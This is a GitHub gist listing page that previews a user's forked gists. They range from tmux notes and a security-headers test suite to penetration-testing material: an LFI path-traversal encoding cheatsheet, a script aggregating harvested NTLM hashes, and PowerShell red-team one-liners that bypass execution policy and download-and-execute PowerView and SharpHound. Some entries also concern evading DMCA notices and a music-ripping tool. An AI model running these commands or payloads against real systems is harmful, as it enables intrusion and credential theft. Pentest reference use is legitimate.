@PixelZA
PixelZA / venom_security_headers_tests_suite.yml
Created January 5, 2022 11:29 — forked from righettod/venom_security_headers_tests_suite.yml
VENOM sample HTTP security response headers test suites.
name: HTTP security response headers test suites
# TOOLS
# VENOM HOME: https://github.com/ovh/venom
# VENOM RELEASE: https://github.com/ovh/venom/releases
# VENOM ASSERTION KEYWORDS: https://github.com/ovh/venom#assertion
# REF AND RUN
# REF BASE: https://owasp.org/www-project-secure-headers/
# RUN CMD: venom run --var="target_site=https://righettod.eu" venom_security_headers_tests_suite.yml
# venom run --var="target_site=https://righettod.eu" --var="internet_facing=true" venom_security_headers_tests_suite.yml
# venom run --var="target_site=https://righettod.eu" --var="internet_facing=true" --var="logout_url=/logout" venom_security_headers_tests_suite.yml
PixelZA / lfi_windows.txt
Created November 14, 2021 18:55 — forked from korrosivesec/lfi_windows.txt
[LFI - Windows Cheatsheet]
Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
Traversal encoding:
===================
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
PixelZA / torrents.md
Created December 28, 2020 15:09 — forked from shmup/torrents.md
transmission blocklist guide

Transmission Blocklist

The Transmission torrent client has an option to set a Blocklist, which helps protect you from getting caught and having the DMCA send a letter/email.

It's as simple as downloading and installing the latest client:

PixelZA / gather.sh
Created November 2, 2020 12:49 — forked from seajaysec/gather.sh
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and NTLMRelayX.py into aggregate files of hashes and plaintext output
#!/bin/bash
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
OUTDIR=${HOME}'/working/loot/gathered'
# Hardcoded location for ntlmrelayx's .sam file output directory
NTLMRELAY=${HOME}'/working/loot/ntlmrelay'
PixelZA / RedTeam_CheatSheet.ps1
Created May 25, 2020 19:25 — forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Domain Recon
## ShareFinder - Look for shares on network and check access under current user context & Log to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
## Import PowerView Module
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
## Invoke-BloodHound for domain recon
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
PixelZA / PowerView-3.0-tricks.ps1
Created January 27, 2020 08:41 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
PixelZA / README.MD
Created September 3, 2019 12:29 — forked from nzec/README.MD
DeezLoader Official Page

Deezloader Remix

(Recommended)

Available for macOS, Linux, Windows.

In the process of a rewrite. Final release will be v4.2.0. The repository might get DMCA'd, so make Git clones/forks.
You can compile it yourself now to test for bugs (see the rewrite branch in the Git repository).

PixelZA / SimpleHTTPServerWithUpload.py
Created February 22, 2019 07:46 — forked from UniIsland/SimpleHTTPServerWithUpload.py
Simple Python Http Server with Upload
#!/usr/bin/env python
"""Simple HTTP Server With Upload.
This module builds on BaseHTTPServer by implementing the standard GET
and HEAD requests in a fairly straightforward manner.
"""
PixelZA / tmux-cheats.md
Created January 30, 2019 10:21 — forked from Starefossen/tmux-cheats.md
My personal tmux cheat sheet for working with sessions, windows, and panes. `NB` I have remapped the command prefix to `ctrl` + `a`.

Sessions

New Session

  • tmux new [-s name] [cmd] (:new) - new session

Switch Session

  • tmux ls (:ls) - list sessions
  • tmux switch [-t name] (:switch) - switches to an existing session

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name: